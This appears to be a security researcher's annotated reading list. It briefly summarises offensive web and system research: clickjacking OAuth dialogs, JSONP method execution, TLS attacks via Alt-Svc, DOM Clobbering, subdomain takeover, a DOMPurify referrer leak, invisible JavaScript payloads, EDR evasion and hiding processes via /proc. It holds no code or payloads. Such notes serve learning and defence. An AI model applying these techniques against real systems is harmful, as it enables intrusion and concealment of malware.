Pressing Buttons with Popups (on Twitch, LinkedIn and more): Some very neat tricks (like the Double Clickjacking technique above) to generate a click on the OAuth dialog boxes of real targets. I learnt a bunch about how pop-under works, and how browsers are trying to stop them. Finally, window.open() does not need user interaction on headless browsers.
Same Origin Method Execution: Another way to think about exploiting callbacks (e.g JSONP) endpoints. Concept is surprisingly simple for its possible impact. I recommend watching the video before reading the whitepaper.
bfcache quirks: Insane research into how to exploit bfcache internals and in general sheds light on how Chrome caches sites.
GymTok: Breaking TLS Using the Alt-Svc Header: MITM exploit using the Alt-Svc header, CRIME attack on HTTPS level to leak out appended secrets, certificate reuse in FTP and HTTPS and finally tricking the browser ALPN check in Alt-Svc by swapping which server the victim is connecting to.
DOM Clobbering cheatsheet: Some interesting nuggets into some DOM Clobbering payload that I do not know. The cid trick seems to stem from a PortSwigger lab, which basically allows raw double quote in the href attribute of <a> tag.
terjanq Same-Origin-XSS: A cool challenge demonstrating how a sandboxed iframe can have null origin, and a popup also inherits the iframe sandbox attributes when allow-popups is set. Also popups can send iframe messages to its window.opener object.
Subdomain takeover guide: Introduce the bug (or more like misconfiguration) class and how to exploit it. Mozilla MDN also has an excellent entry. Note that domain takeover is not limited to CNAME takeover, which is the scenario written in both articles but also NS takeover, as seen in this research
Parser Differentials: How using multiple parsers in different languages can cause problems. It is so interesting to see programming languages disagree on a piece of “magic” YAML. Note to myself to revisit once I have the time.
DOMPurify Referrer Leak: Lab to highlight a (currently) exploitable quirk of DOMPurify that allows to specify a <meta> tag with unsafe-url referrer policy. When DOMPurify parses the markup (e.g a <meta> tag followed by a <img> tag), then even if the <meta> tag is removed, the <img> is loaded with the unsafe referrer policy. This allows leakage of any parameters in the URL.
Jailbreak your Enemies with a Link: Remote Execution on iOS: This sheds a lot of light on how the crazy browser exploits work. After reading this I understand the “magical” block of code that often does 1000 iterations of seemingly nothing.
Invisible JavaScript code: Hide JavaScript payload from plain sight using Hanggul filler spaces. Might be very dangerous in supply chain attacks.
The (Anti-)EDR Compendium: Very well-written article about how EDR detects malware and how to circumvent them.
The ‘Invisibility Cloak’ - Slash-Proc Magic: Very cool research on how to hide malicious processes by manipulating the entries in the /proc folder. It also shows anomalies that can be used to track this technique, and how ps works (to explain the reason why the malicious process disappears in ps output)
Tracking myself through in app ads: Very cool to see how ads work. Solves a lot of mystery for me on how these apps seemingly react to my actions almost instantenously after I clicked on some ads or searched something. The author has a follow up article to set up local environment for exploration of how intrusive these app trackings are.